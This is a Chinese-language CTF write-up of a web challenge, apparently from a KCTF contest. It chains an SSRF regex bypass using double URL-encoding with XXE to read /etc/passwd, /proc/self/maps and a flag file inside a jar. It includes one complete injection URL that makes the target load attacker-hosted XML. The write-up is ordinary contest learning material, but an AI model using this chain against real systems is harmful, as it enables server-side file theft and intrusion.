Hello 大家好，我又来写Web题目的WriteUp了，抱着春季赛web题目=打卡题的心态我就来了，谁曾想到秋季赛的题目如此变态。从中午12点到晚上七点半就起来上过一次厕所，再没离开过电脑。要不是xtgo五虎将全军出击，不然这道题我就只能继续奋发图强（shan ku pao lu）了-.-

OK言归正传开始解题：

一道Web题，访问链接：

http://121.36.145.157:8088/

利用技术绕过限制，获得flag.txt文件中的值。

首先访问域名发现，谁给kctf首页的图偷来了。。。

打开抓包工具看看刚好发现有个备注彩蛋

访问彩蛋 http://121.36.145.157:8088/loadConfig?url=x.xml ，可以看到接口有IP限制，目测接口的功能可能是加载服务器上的某些配置文件

遇到了IP限制当然要试一试XFF

结果就是这道题的考点不是XFF，header全加上也没用，还是提示" not allow ip"。
接着看下刚才访问首页下载图片的第二个接口
http://121.36.145.157:8088/getimage?url=https://bbs.pediy.com/upload/attach/202009/236762_Y76C73KQC7MG83G.jpg

看到url中的 ?url=http://xxx 一下就来了精神，配合刚才限制IP的接口，肯定是SSRF了,改一下跳转的url地址到某度，发现跳转地址有正则表达式限制，刚好也返回了过滤规则

分析下正则核心的三个条件
1、一级域名必须为看雪域名 pediy.com
2、二级域名可以填写除?$/三个符号的任意内容
3、path不做任何限制

通过前一步的信息收集和题目理解，大致的攻击思路为
1、绕过getimage接口的过滤规则
2、绕过后通过SSRF访问loadConfig接口
3、通过loadConfig尝试访问服务器上flag.txt文件

首先将getimage接口中跳转URL的二级域名和path替换

发现提示无效的端口号，并没有提示正则错误，那就对整个域名进行两次转义替换（浏览器和服务器接到参数后都会默认进行一次decode，所以需要进行两次encode）

成功绕过正则限制,出现异常回显

本以为今天的活动到此结束，谁知道这只是开始。。。

访问/flag.txt发现没有找到此文件，然后尝试读取/etc/passwd发现这个java接口只能接收xml document

怪不得前面的彩蛋提示是x.xml，原来是暗示传入一个xml文件，既然是xml那只能想到XXE漏洞。使用XXE则必须将注入的xml放在公网，SSRF跳转时可被访问到，先写个test.xml验证一下XXE确实存在

test.xml

公网测试

注入接口
http://121.36.145.157:8088/getimage?url=http://localhost%253a8088%252floadConfig%253furl%253dx.xml.pediy.com/loadConfig?url=http://ip:port/test.xml

发现报错回显不一样了，XXE看来有戏，构造访问文件的xml和dtd(涉及到ip:port的地方请自行替换成自己的服务器地址)
xxe.xml

xxe.dtd

在dtd中先访问/etc/passwd ，成功获取到passwd的文本内容

接下来是最心塞的一步，寻找flag.txt，大家一起找了几个小时。不过最终功夫不费有心人，通过/proc/self/maps文件找到java程序的调用记录，成功获取到jar包存储的路径和文件名 /home/vip-demo-0.0.1-SNAPSHOT.jar

最后一步通过jar:和file:协议访问jar包中的flag.txt
参考XXE注入
xxe.dtd

成功在异常中获取flag！congratulations！

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课